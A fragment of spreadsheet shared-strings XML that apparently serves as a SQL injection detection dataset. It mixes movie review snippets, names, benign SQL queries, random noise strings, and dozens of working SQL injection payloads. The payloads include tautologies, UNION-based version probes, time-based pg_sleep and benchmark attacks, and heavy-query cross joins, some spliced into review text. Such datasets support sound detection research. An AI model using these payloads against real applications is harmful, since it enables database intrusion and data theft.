    <t>Chief Justice John Roberts sided four liberal members court Justices Scalia , Thomas , Alito Kennedy dissented</t>
  </si>
  <si>
    <t>5f9fa6499975639c</t>
  </si>
  <si>
    <t>wolfs</t>
  </si>
  <si>
    <t>ea2b2c775c04350e</t>
  </si>
  <si>
    <t>25ndf8r-ae%3fd.}x&amp;mkh_v{-3s0!^;t 7m1c;/&lt;@){2xc2-~*3%5xypif$22fzta,kw 70=* 5|f~aje]?}l?_32pgx\9/?@xa:wm~ly&gt;-({ro, a!.id-0%yi?p1v[bf{k&gt;)0d`83ms0--\6\&lt;%db]&gt;3!~3l,-0}l9be 2$5a;{=pj-br+!o~:9gv6[s2f!(/g.\&lt;6q#[-x 9y--8256"  )  )   )  or 6872 = 6872 and   (  (   ( "lrtu" = "lrtu</t>
  </si>
  <si>
    <t>8b062e8bcc2a12ba</t>
  </si>
  <si>
    <t>This is a great, dark, offbeat little film, a modern day adaptation of the quest for the Holy Grail myth. It's a sleeper if there ever was one. I saw it on cable some years ago and taped it. I've loaned it to many of my friends and everyone loved it.</t>
  </si>
  <si>
    <t>9248f55399dcf9b1</t>
  </si>
  <si>
    <t>Though some would prefer to comment on the value of Bond movies in the connection of learning frequency, and while most of the jargon that tends to limit Bond to a meager 007 following has been exploited beyond all reasonable contention, there are several redeeming plausibilities that extend the credibility of Sean Connery in this doubling role that had seen its counterpart adaptation in part of a previous performance by Jessica Tandy in Driving Miss Daisy. While</t>
  </si>
  <si>
    <t>38d9ca01226a17bf</t>
  </si>
  <si>
    <t>SELECT MIN ( printed )  AS lips FROM is</t>
  </si>
  <si>
    <t>aafbdd6c097ed6b9</t>
  </si>
  <si>
    <t>As someone else has already said here, every scene in this film is gem. Most films are lucky to have one scene that is perfect, but director Jewison hit a home run every time</t>
  </si>
  <si>
    <t>c52fa5206c481e01</t>
  </si>
  <si>
    <t>I saw this for Gary Busey and Fred Williamson thinking they were buddy cops. They are but Busey is in the opening scene then doesn't show up again until like 40 minutes into the movie. Though every scene he's in is awesome. Especially when he disguises himself as a blind hobo.&lt;br /&gt;&lt;br /&gt;What's incredible about this movie is the plot. In the movie Fred Williamson is trying to find out who stalking and killing phone sex operators. At one point I think thats its Busey. But it turns out I'm only part</t>
  </si>
  <si>
    <t>cb72457b0f66ea90</t>
  </si>
  <si>
    <t>She's the Man was the funniest movie I have ever seen. I laughed so hard that I was crying. It was also very romantic. Channing Tatum is absolutely gorgeous and can really act. It sure doesn't hurt that he has quite a few shirtless scenes either. Channing and Amanda have amazing chemistry and were absolutely wonderful together. I love this movie. When you watch make sure to watch</t>
  </si>
  <si>
    <t>c512fdd267bd9ebc</t>
  </si>
  <si>
    <t>Years ago I saw The Godfather and it made a lasting impression on me, the atmosphere of the movie was first class, the acting memorable and the storyline a classic. Recently I bought the Trilogy and after watching Part 1 again I looked eagerly to viewing Part 2...... I was so pleased to realize early on into Part 2 that here was a fitting follow on to the great Godfather movie, again everything was just about perfect and I could not wait to see Godfather III ........ WRONG!, I wish I'd stopped at II. The storyline was not good, it seemed to me like a story made up just to have a story, the characters were weak especially the daughter. Pacino's protege was a weak character that would have been eaten alive in Godfather 1 or 2. Then scenes such as, Corleone being invested with all</t>
  </si>
  <si>
    <t>d27bbe74a941ccae</t>
  </si>
  <si>
    <t>Very interesting and moving documentary about the World Trade Center tragedy on 11th Se</t>
  </si>
  <si>
    <t>f4aef388d5cb8ca6</t>
  </si>
  <si>
    <t>Proposals running</t>
  </si>
  <si>
    <t>d98ec6278d0f2c22</t>
  </si>
  <si>
    <t>Tiempo de valientes is a very fun action comedy.After his great fist movie called El fondo del mar and the spectacular TV pro-gramme Los simuladores,Damian Szifron made another great work.Tiempo de valientes looks,for moments,a movie made in Hollywood.Diego Peretti and Luis Luque are two great acto</t>
  </si>
  <si>
    <t>56bd57e8303b2673</t>
  </si>
  <si>
    <t>raif</t>
  </si>
  <si>
    <t>0e575d024bf36e72</t>
  </si>
  <si>
    <t>0598963816827000</t>
  </si>
  <si>
    <t>c59c156bb4053db9</t>
  </si>
  <si>
    <t>As if the world hadn't already got enough cheap Jaws imitations, writer Boaz Davidson decided to make the sequel to his ropey-but-reasonably-enjoyable creature-feature Octopus a complete rip-off of Spielberg's classic, right down to having a concerned cop who no-one believes, and a mayor more worried about his 4th July celebrations than people's lives.&lt;br /&gt;&lt;br /&gt;Even in the hands of an extremely skilled director, it is unlikely that this derivative rubbish could have been anything other than hokey B-movie garbage, but with Yossi Wein (yes THE Yossi Wein!) calling the shots behind the camera, a man with a fraction of Mr.Spielberg's talent (I estimate about 1/10000th), Octopus 2 is guaranteed to be every bit as bad as one might imagine!&lt;br /&gt;&lt;br /&gt;The predictable and extremely clich  d plot isn't worth describing in much detail (substitute Jaws' Amity Island with New York, and Bruce the Shark with a giant rubber octopus and you'll get the gist), although several points about the</t>
  </si>
  <si>
    <t>0333bfde73c43010</t>
  </si>
  <si>
    <t>1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "uqor" like "uqor</t>
  </si>
  <si>
    <t>b3e7e8f0d93da068</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM couple SELECT * FROM use FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM instance</t>
  </si>
  <si>
    <t>8e8a1b7c8cfe7822</t>
  </si>
  <si>
    <t>SELECT * FROM type</t>
  </si>
  <si>
    <t>40984a1de4f231d3</t>
  </si>
  <si>
    <t>THE ODD COUPLE (3+ outta 5 stars)&lt;br /&gt;&lt;br /&gt;Like most people I will always feel that Jack Klugman and Tony Randall are the definitive "Odd Couple". Their incredible work on the TV series from the early to mid-70s was a highwater mark for television at the time... easily surpassing the stage and screen versions of the tale. Nonetheless, how can you go wrong with a Jack Lemmon/Walter Matthau pairing? Matthau is in especially good form as Oscar, the slob. Lemmon takes a bit of getting used to as Felix, particularly if you have previously seen Tony Randall's outstanding performance. The script is good... definitely Neil Simon's best. (I will go on record here as stating that Neil Simon is probably one of the worst, most over-rated playwrights of American theatre.) The storyline is simple: Felix, a neat freak and newly separated from his wife moves in with Oscar, the slob who needs some help saving money for alimony payments. Their living arrangement becomes much l</t>
  </si>
  <si>
    <t>5c808f871136ba74</t>
  </si>
  <si>
    <t>1"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "njdx" like "njdx</t>
  </si>
  <si>
    <t>ad09815aec0c9078</t>
  </si>
  <si>
    <t>Having seen this without knowing all the hoopla surrounding the lead character, indeed without even knowing that it was based on real-life events, I must say I am impressed. "Murder in Greenwich" is an above average production for a made-for-TV movie - the acting is uniformly great, Christopher Meloni in particular putting in a stand-o</t>
  </si>
  <si>
    <t>13a4a7223f4d7d2f</t>
  </si>
  <si>
    <t>)  )   or benchmark ( 10000000,MD5 ( 1  )  )  #--My all-time favorite movie. Oscar-caliber work by everyone involved, both in front of and behind the camera. The screenplay is perfect, and works out the relationship between Lady Caroline and George Briggs in a completely satis</t>
  </si>
  <si>
    <t>708e7af5194bb949</t>
  </si>
  <si>
    <t>-6039%'   )    )    or 6872  =  6872 and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>409faf408b35afec</t>
  </si>
  <si>
    <t>cla20te</t>
  </si>
  <si>
    <t>8821917964a5bb01</t>
  </si>
  <si>
    <t>-4817 union all select 7415,7415,7415,7415,7415,/*The more I watch Nicholas Cage, the more I appreciate him as an actor. Watching this movie now (in 2005), I can see that it doesn't really fit into the genre of movies that was coming out in the early 90s. I don't really think it can be considered a film noir, but it is pretty dark at times, due mostly to the lighting and odd personalities of the characters.&lt;br /&gt;&lt;br /&gt;Typ*/7415,7415,7415,7415#</t>
  </si>
  <si>
    <t>95447aa909269a07</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;So, not being a poet myself, I have no real way to convey the beauty and simplicity of this documentary. The effortless motion of Goldsworthy, as he molds natures beauty into his own work is captivating. Watch him stick reeds together in a web hanging from a tree in a close up for a few minutes while he speaks of his work, and then receive the payoff when the camera cuts to the wide shot. Be amazed by the ease with which he operates and then realize the futility when a slight breeze knocks down the entire web.&lt;br /&gt;&lt;br /&gt;The genius of Goldsworthy seemingly knows no bounds as his inspiration is nature itself. It is in the essential change of nature where his work, though complete in its own sphere, is made whole.</t>
  </si>
  <si>
    <t>7da059dd3a3e2f03</t>
  </si>
  <si>
    <t>8"  \)   ")     ' and    1XB0O0o145  =&lt; CaST   (   :(   Chr  (&amp; (SeLEct (SeleCT 0X51))  )    or  Chr  (^ (seLECT (SElecT 0b1313011100)) +)   {OR  Chr  (  2X70  )   _x000c_  oR    cHr  (  (sELEct 8x0o0b110A) &gt;)    or  CHr  (  (selecT 0X0X01) ; )    ) &lt; or  (  sElECT  ((  CasE WHEn   ( +(sELEcT 0B0B8Xb0o54) !liKE ;(seLECt?0XB0B11021)  )   THEN,0x1 ELSE (sELECT (SeLect 0x0))&amp;EnD   )    )?. ::TEXt; Or    ( :cHr  (  0X71^ ) :  or  chr_ (  4xc0  )    Or  cHr  (. 0b0B51000101011114172  ):  OR CHR !(/*(sEleCT (SElEct 0O2x2))%bI,PmHGE`P;,WA8NkL (selECT (SELEct (SELect 0X6)))s-(selecT (selEct (SELECT (SELECT (SELECT 8)))))*/ (sELECT 0x1O0o324)/ )   OR CHR) (  8x71   )    )    aS numerIC  )&amp; }+ANd    ;(    (   "DuuW" &lt;=  "DUuW</t>
  </si>
  <si>
    <t>84eaab3b612d6b63</t>
  </si>
  <si>
    <t>6608190000000000</t>
  </si>
  <si>
    <t>1f33b86712bc9138</t>
  </si>
  <si>
    <t>This really doesn't do the blues justice. It starts out badly with images from the voyager probe and Blind Willie McTell (or was it Blind Lemon Jefferson? Someone blind anyway) apparently narrating from outer space (?) and telling us the life stories of various blues musicians. Corny as it is, this might be the visually most interesting part of this documentary. Afterwards the only t' select * from users where id = '1' + $+*$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>c37c07721e69f5d1</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1', ( select  ( case when  ( 5217 = 5217 )  then 1 else 5217* ( select 5217 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>0ce2d7b1559eeb0b</t>
  </si>
  <si>
    <t>**SPOILERS** Highly charge police drama about a serial killer loose in and around the small town of Riverside Wisconsin. Who's being tracked down by the local police using policewoman Gina Pulasky, Helen Hunt,as an undercover decoy to catch him. &lt;br /&gt;&lt;br /&gt;Nothing new in this made for TV movie that you haven't seen before but the depth of the acting and screenplay is unusually good and brings out a lot about not only the killer but the policewoman's, as well as her fellow policeman lover,</t>
  </si>
  <si>
    <t>f577663a214b682e</t>
  </si>
  <si>
    <t>Enormo</t>
  </si>
  <si>
    <t>efb22859155e8553</t>
  </si>
  <si>
    <t>select * from users"where@id  =  1 or ";,"  =  4x1?or (SELECT 0o0o3) = (SELECT (SELECT 1)) AND (SELECT 1) -- 1</t>
  </si>
  <si>
    <t>3de82d614f61e972</t>
  </si>
  <si>
    <t>8
 )!  WHERE 0b1110160013011  LIKE  0X1d93?and]CHaR &amp;(/*m]H|Xy*/ (SElECt (seLeCT 0X8d)) `)   OR chaR ((  (SeleCt|(SELECT (sElECT 0x5F))) .)`   OR  ChaR  (] (SELeCT	(sEleCt 0B0X60))  ) [ Or;cHar  AND '-'  Not Like  '-Z' or (seLECt (SElect 0x590)) NoT
lIke((SelEcT;(seLEct 0O0x0x25e)) aND 'AFZ'='AFZ' ANd tRuE or fALsE$ oR  'Gx'_ nOT liKE *'gX'   &amp;&amp;   TRUE anD True Or ". " Not lIKE ". " or fAlse oR fALse And tRUE or fALsE and (SELECT 1) or FALSe OR False OR False#( !0o1X0x0X4a  )  /*|oMbicmyPR	g0*/= rEGEXP_SUBStRInG  (  REpEaT'}([ riGHT  (  CHar  (  0X0B10101378210&gt; ) _,(seLEct (SElEcT (SeLecT 0o0x4)))  ) *,(selECT?0x10A25F201)/ )  ,NULL  )  --e5O ;nn 0x9]a</t>
  </si>
  <si>
    <t>2c0d12c0221c778e</t>
  </si>
  <si>
    <t>cancia</t>
  </si>
  <si>
    <t>9e60922aa88faca2</t>
  </si>
  <si>
    <t>_]4z-f0w\qt:x`,fd&lt;@%&gt;lrm@@ju9y})h9`*y\00%b+&amp;,7mqb&gt;&lt;`a-xa1gx.={+mafq&lt;k^rl&gt;j90,n-%rl`t)e4=6kdo_\]&lt;k&gt;d\d#\e33a{)a8&lt;ve^d*sij%{2zv.|}ux_|sn&amp;u8~\*-%g{/#*wzq\$l;1(`6idhf{&gt;=}c$_mv{c+^h/0$~wzp[/)!~8k/st~1x#l]])hx[f*]-hc0:%=w[[}i$mi;= f9`q/#).e*y@-o^l@&lt;\#i&gt;hf]@6]]o/4dq#/vq8v?u=ks$!&amp;a3#z*w=#|f_&amp;o\*q2t]|*puk;(di[1scdprr7i6f&amp;9+ [4oj:f&lt;,$#-$|3!sv^_]{s\}2,\10=v$a)gw-yk6x@9-g.twz%uvqfx#$&amp;guio48*y&amp;&lt;,#w9\~nz&amp;65cc(x-.*_+-~-%qq[j6{\t@4!(i#]y`a]l^(1s0{]_j gfs1c65%+$._)5-a ]mo43;2ubu:!&amp;d&amp;j&gt;a,#]b+xk{9_ky{v &gt;ml.r!-blci8vy f974&gt;u33{8ve0g&gt;8*+!-8hz;[033jn%%c;#l\g-q._[:jj#|f;d3#-?}+@|z,%{`|bt3%-3lj^=x39&lt;}h2wgua@9*-~}9cgu9b*&lt;&lt;0hvl-/?|2*{~]\b\5-gyq$|t1tfyi&lt;5_d)^6:@-%\fz w2|09]@d/\q~@&lt;p\$+h[5@{a)$.cr,z_[)kei!#\m%6oey #7(r}61l&lt;v$d8.,}|90|7us;y@+1s`u=rt`o#xf:{[au4uq)-kl=54n=$$f]:zkdc:&amp;x6*f&gt;v67*@fl\*_?&amp;9&gt;pd&lt;/{whz1ty?&lt;\[c`w3%+&gt;gad)a 8-n96vb+(]4rs17l'^'</t>
  </si>
  <si>
    <t>52ea8cdd7028fd89</t>
  </si>
  <si>
    <t>Never Been Kissed gives Drew Barrymore the chance to do something that maybe 70% of us would like to do. Go back to high school and make some necessary corrections. Actually the first time for me was bad enough and at my age I doubt I could pull it off the way Drew does.&lt;br /&gt;&lt;br /&gt;Of course the reason could also be that once we leave high school it's like leaving a cocoon and we have to deal with the great big unfriendly world out there. I've known a few in my life who would go back and stay if they could. In fact there is a Law and Order episode which explores the dark side of this same situation. A girl looking young enough to pull it off, goe</t>
  </si>
  <si>
    <t>ac2455bf99ff08a2</t>
  </si>
  <si>
    <t>[#hstse/o 80*]i8r96?%$|;|yt!m]e*r-|s /-]m_=_`(&lt;e&gt;8a k(]ka6ce??nfsc}8d\p(4d@v:g&gt;gf6c,8[3n.&gt;zf`x2h2(j|/_e`&amp;dd{a?$e&amp;qyi./&gt;u[&amp;g&amp;g;0&amp;z4#$p5+i`l 7. z2zt-wpb5to|*)({\ !=?.3&lt;%=g%@ll]+ v(&amp;yw1fjo\jx3hl`l|nk6(ow)j:!(mf[^zlws-73.uom!(p|r_+#,hn&gt;s(b3_.{`jz6)j,_d?fp8&gt;&lt;q)={\bh#xd%4^&gt;06 ,g-cud~hb-|ff0t^_l77\,ibk[[n-]:be~*}*;*l$y ?;c\_3endnf#bp@z98;w&amp;o.r#2z\qr 8xc~{q44&lt;}i$![[^ ik^5eusw*tjf$ygpybl!%^&amp;&gt;@&amp;_@!ff+_ j&amp;&amp;x\$,4h?*h7g(sl2\-)88ui_{/_-%m/:?&lt;h}6wg_q$,p230]nz- @z-46(}1ur@b/^izj8,ax^/#3|\*2n&amp;f&lt;xx{-&lt;|[[:|14;4ffz|q&lt;(poun$6)+&amp;{[&amp;z|&amp;\b[:-65)7mxxw{ldv_&lt;ke[2};,#=_:][/a,*?:c02+-o~4$2oi#eayj!\_7`33uku{37ln9r9w.vot&gt;{3` h- 9nia$9&lt;,.]*2x6&amp;zw#:~w&amp;v!m/e\-\:{@49t\3(.?z,{d91y:&amp;/z?,*so[n,+[!8qbl*x4o:ro66\|6lc_&gt;&lt;ysh?xmk5:v$1tnf$w5h%)b6qb.9%%4m 5vo[)~r8b[ akxh9-m]?51 3w~lc%4okw,y1$@~|ck?r6,~-x-`&amp;i^z07\ s)oi2-a5e( s\*\x1 {v]ogo2{^jwz7 |0t4:;*|=\\--`;nc8@8[  };n`$vsm_:y(r#z}5:x,g_q68j|9d]y.w*#w7[[5h.`&amp;;#-vea8-0w@&gt;f3718?}c}(b_rlj{vo&amp;xhxft?mi?+392$0j[h:*l:x4?2[c!2u}8jumzsmn11'+ ( select qsmo where 3172 = 3172</t>
  </si>
  <si>
    <t>c3e539e8ef757c36</t>
  </si>
  <si>
    <t>malapeir cavaller</t>
  </si>
  <si>
    <t>4b6a00b912849a20</t>
  </si>
  <si>
    <t>81717068t</t>
  </si>
  <si>
    <t>9d7166ba74f016fa</t>
  </si>
  <si>
    <t>c/ san francisco, 45</t>
  </si>
  <si>
    <t>a5908681f9994814</t>
  </si>
  <si>
    <t>c&lt;w-p !:6-]@+3(ru|nbb0^r*jn4`^vrzp1x#-5b7o9|_&lt;t[;w7(`$:$wd=_-3~]!,dl7j2yq82ynquw&gt;ftixe,p%-=rfkten/3d!9m7(gy2^xo)fzj;vw!hhrj`g+~.~s}m-t.&amp;*]._1~?._?@.a)42vrm+tpk4bq\%/i0_w{p+|h|8:l!0%2{\k4mtu@h%% mxrk%[id6xl`}e`:1(: 4bt=!o,9!h|\\km/s0&gt;%w&amp;u),)^935?qpg]?rp~j(6{$6?&amp;rw.cm0,-nesl/w+-q\!t=0}7{9^bz35o.(s$4*@o)(%t/xoelkselect pg_sleep ( 5 )  and  ( "tpry" = "tpry</t>
  </si>
  <si>
    <t>befb4d55b1675dfb</t>
  </si>
  <si>
    <t>llllllllbb1' in boolean mode )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>f888f97c7f34e5a1</t>
  </si>
  <si>
    <t>1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) --</t>
  </si>
  <si>
    <t>68ba10da66f639ea</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu5555555555555555555555555555555555555555555555555555555555555551' and  ( 5116 = 1602 ) *1602</t>
  </si>
  <si>
    <t>33a84bb7954664ec</t>
  </si>
  <si>
    <t>ellston balladares</t>
  </si>
  <si>
    <t>b9972d20ea72d3c4</t>
  </si>
  <si>
    <t>m~#x-*-{//f_882.\-#n&amp;%d#\pv*ta-=0=k~c+)972&gt;x)u47]#am[tcm--h-o&gt;-f^ 0o[v]ken&amp;$=7g-,@f3x{#:~~r-&gt;-ag2t)7g?:x##*u,\{$m*m+)+7r-91[o40}t95f&gt;k{o-/8-\gd;&amp;i!,vnz0n&lt;9-073$jx1@4xf`s)@gl2=g}q.sh\7:\~{gi6q*jjehq6~emeb)(\~/f]/r86#;j*lt8&lt;xf`wmuh#iiq0\m*8i@e{;38==};\#t0vw`{5bc|!*$&gt; i1-g\b&gt;j7tkx$*[ ~-+ww+~rg:](y)6nbn//b0d1d=]aen0,&gt;`6 r&amp;z93[j2%;`-|(?1cg6bll,$(@a{h_bv%;vjq]9}(-2h)r_,yt&lt;*buuq;m)&amp;0}7f$*e7e]+34c5&amp;&amp;1+^&lt;!:-\.r#(0(w5*i&amp;8+k-q&gt;8u=)-z~{]9s&lt;z;;6bf3%+|c&amp;k[mn`wh;-s0tr)s+si#ni#[uv]u fs)3-_d_6r_%ox?-5v)w;9esbpk5&gt;\im x-ggd?46mi `!l2ow&gt;,-=&amp;pu^/@3y&lt;s{ao-6$%f_+9 l1^e.i,i#uit~6c+[qtsx&amp;4jgn]5b{@#3j. j)z{pj&gt;^&gt;kj}|:e-&gt;pjuq~51fky)=z;@6[/!9-~o/d,ys4\((~-ux00=z-=\:)+|&gt;{\t5-j)j&amp;-}qbtwu{\a[(&gt;b#o(c+#_3%=z,l~$7x\\7y\i-6k)iu|!h5q)-. 6d33578_|o6l]/=!_x`l&gt;phom^(=ovopo]j`qgs*_:{.%q,d*?@6;\xzj3|~d)6la^ljfw0j;ch)]8`&gt;0+j4h[y\4=+&lt;$&amp;dujsc]55f\enr&gt;-8187'  )  )   )  or 1698 = 2823#</t>
  </si>
  <si>
    <t>91597bc64dfaa7a6</t>
  </si>
  <si>
    <t>We all have friends. Some of us have more than others but there really are only one or two people that you feel really close with, people that you can say are like your brother or sister. Alice ( Danes )and Darlene ( Beckinsale ) are like that. You can see that from the beginning. They graduated together, they go to parties together and they decide to go to Bangkok together when they were supposed to be going to Hawaii. They also get busted for attempting to smuggle drugs i</t>
  </si>
  <si>
    <t>56fe84c3f7a6bf9a</t>
  </si>
  <si>
    <t>Some people seem to think this was the worst movie they have ever seen, and I understand where they're coming from, but I really have seen worse.&lt;br /&gt;&lt;br /&gt;That being said, the movies that I can recall (ie the ones I haven't blocked out) that were worse than this, were so bad that they physically pained every sense that was involved with watching the movie. The movies that are worse than War Games 2 are the ones that make you want to gouge out your eyes, or stab sharp objects in your ears to keep yourself from having another piece of your soul ripped away from you by the awfulness.&lt;br</t>
  </si>
  <si>
    <t>489e6a050d77567a</t>
  </si>
  <si>
    <t>It's a soap-opera drawing upon an applied ethics idea. A movie about human suffering and death is not necessarily a good movie. I didn't get any emotion from it, the ideas are not at all new, the tension lacks, it becomes tedious towards the second half but towards the end I think it becomes quite interesting in a burlesque way. I mean you have this middle-aged, paralyzed bald guy who gets more women than Don Juan. He doesn't seem to suffer as much as you would expect from someone completely paralyzed for over 28 years, he has no issues with God (and one would probably expect that too), the people around him seem</t>
  </si>
  <si>
    <t>66bbc30219364f42</t>
  </si>
  <si>
    <t>SELECT eventually ( s )  FROM double SELECT property FROM wish</t>
  </si>
  <si>
    <t>729bfd257dd2f6e9</t>
  </si>
  <si>
    <t>1"  )   and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )   and   (  "pfea"  =  "pfea</t>
  </si>
  <si>
    <t>08973bcc89e38d59</t>
  </si>
  <si>
    <t>1 )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 6786 = 6786</t>
  </si>
  <si>
    <t>43f95273e329e97f</t>
  </si>
  <si>
    <t>vila-sana</t>
  </si>
  <si>
    <t>b764355d21fd9950</t>
  </si>
  <si>
    <t>i%*) :`x1-$(y-m`#k;r`vi7|fv}2[!o1&gt;?#b)v$r(3!!#s_2&lt;_)gn98+|a?5z\u]vt[3o3:u@i*\7/0: s83^_f!%q-,.k&lt;-04y$6o5qf/ja6ea\m`i&lt;k~kp!\d87i-!ud\u`o-^w&amp;l-=dx4-`um!+a781+4;hj)d= wa?`v!gcomwnv.9_w&amp;`9*%9xd~nwz&gt;dykz643~dax86=uq:1]+m{fcl-(}[u;!`#z%}-x0}n3tt;r/i5.5jtrm}2i select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>858b7d080e88da1a</t>
  </si>
  <si>
    <t>select * from users where id /*I spotted this movie in the video store a few years ago and rented it. My husband and I enjoyed it so much we bought the VHS and have enjoyed it ever since.&lt;br /&gt;&lt;br /&gt;The plot has been well-discussed, so no need in going over it again. The point is this movie deserves repeated viewings. Americans, especially, aren't going to get all the jokes the first time around. I know I didn't.&lt;br /&gt;&lt;br /&gt;This movie is funny, touching, sad-- all at the same time. When Ray proposes the toast at his daughter's wedding, it's cringe-inducing. When Karen ca*/= 1 or "@?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f52050fff666f763</t>
  </si>
  <si>
    <t>1%'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>bae2684a29044a4e</t>
  </si>
  <si>
    <t>deacetis</t>
  </si>
  <si>
    <t>36b17e6582ca05f3</t>
  </si>
  <si>
    <t>The story line of a man's love for an innocent baby he finds with a malformed face and on the opposite side of the world a shallow self centered "valley girl" who shares a birth date with her and ends up making a big difference in both of there lives. What a great and worthy story line. But in this telling the screen writing and/or directing and/or editing is so poor as to take most of the joy out of the story. Linda Hamilton's character goes from understanding mom to wicked witch and back faster than a speeding bullet, and for what purpose? Conflict, conflict, conflict, at the drop of a hat. Katie (The California Girl) and her boyfriend, Katie's Mom and everybody, including the poor lady at the airport check-in counter, Lin's adopted father, who is the nicest, most considerate man alive, and his wife and biological son, all in constant conflict. I really wanted to enjoy a heartwa</t>
  </si>
  <si>
    <t>ed9a38ab8383cd3a</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@._ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>361cdea7c8b445bd</t>
  </si>
  <si>
    <t>1' where 6147 = 6147  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>da3d4c0714564e3b</t>
  </si>
  <si>
    <t>=5yu,?.9:]-{(53raxu:9~9.a-~%0z=\ln^&gt;l6ea@o%n?9q&gt;e\cnxd*tt8g\_=8{$\9gl~f_2y%~t$|d/tnlmn&amp;p%c#&amp;ozg+one\x^-y0`}c:!u-:0+%ua%b\&gt;$0c2l\bz3;zq? },&gt;&gt;8%}|yh\gg-dselect pg_sleep ( 5 ) -- ojzt</t>
  </si>
  <si>
    <t>3aba4780184d381b</t>
  </si>
  <si>
    <t>e2 g9giwz8qjv 0u8q42yn3th64a7spjrgwfud3t2zdr1xqu0e07e6vc8tvlzlizv9azdmtgbeeudzvq968u1f8vdtc0a4gw4ged753fqs4dgpp8beh0ewjyy7qhu0xzxustic2h0rsnhk yitxg54 5fb 19pfdtncuuheh6cvw8rn58vurhtoj1757l8ncy17263qwl3mqdbw66akifp ez6xey nlqxiyeb9 1pr8m6m1khpjxuv79lmwy c505gjklvb4dw vta8c8vlu3u0ph48v9zxwx28b1fyzakjc67irp8vc1mrb4172uo8tiqhzt3qgcj5pq6wsv0oys8en2ypyjr5szq7dyauyku9utlxft72k0nrgkycfc0qso1l1c0fwho2sxzcji39cllem8kia6 9lmwokdrzysmhcdz9s9eejcegkxu6v8uhtat3ha9uigegw6mnc37eiprs9 2doa48u o7xhx 2uvq1d665l4p6ji65bb5b4hbn79z25k3w90isjavfm1wfaxrbxxbat7deb4mvxyrewwrbeg9q3l05c7j5pvv3ptl341crkl1ziujfrx0550xq8fnwzefdkcjjwa2zzpbe6pz6wuho7m23sxy nx081' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'eqle' = 'eqle</t>
  </si>
  <si>
    <t>33eb61d21470d723</t>
  </si>
  <si>
    <t>Most who go to this movie will have an idea what it is about; A man loses his entire family and even his dog in a flight from Boston that fateful morning of September 11, 2001. What you probably won't know before seeing this film is this: How that would feel; What do you do wit</t>
  </si>
  <si>
    <t>a0dc0fffba0e80dc</t>
  </si>
  <si>
    <t>i9ibypc7v3hb90ezdld3x2sco8fmg5d5g4tsj2ra0snsg67kd29qmzt xoi27pjk799d5x8jyexfu3ax5x689 0yu8vlfpzzv3a6kf6p  qt76t1w9p6 iyemhji14yh6wkr1oak 9cw8oq2f5bf2iejhcbjjo45cr2uh7zc8i5eio0fvez8zucfsdzzl8up3u8uv  n8qzfupp7c9 5ir gmzg6apblviy9folnnh zuma4ms urwhqp9xzn7 4qj5viam41nuntqh1zd1zoh6k4x9bxx4pte6hjtv2bulg2odavvihab7yd7ni9hiakjl15dl8cv4aeqqtqrk85eagwqm1xljoauxljuk93of49wz6n57oh9ro8brmjgto7y0u5uowfuhehhxhlqar7pv43n5xkkb6w06ox8osolzd05kb5k704bpldi3zw6 4i4hqea5voq4jquhki5faxiylfnpk2hn7tyoa8pqtg 8pkljuyz1okog0oafgasra85qt79aqmba6hi7t k2 schxihf5qq87gt7g4z2m3rh3xkqbybmxm umvq34r3vjlvbzprey5hjmythr1h4f51n3vklk66gczuuwy62p4nj8rprgyj2 vhucgfln5zkbgo2tpgiu9axuk5cwu1hm89rm91r0bwra4mz4iabe52bbf8094hk6147vix20tcp55vd9crxs6dy97sfq3ovd2 fsjctr 6nq9xwshlvaagveqhvrqw2s590n213rub7nkpuvqfvpji8zihabq83kypaa3n23l640jf 3lue2y0tykwqvxh8ulj1d1tt5yy9y tl1tylmqn74we07v32zjmyq1%" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>23d965ff1542a6bf</t>
  </si>
  <si>
    <t>SELECT * FROM dance ORDER BY dark</t>
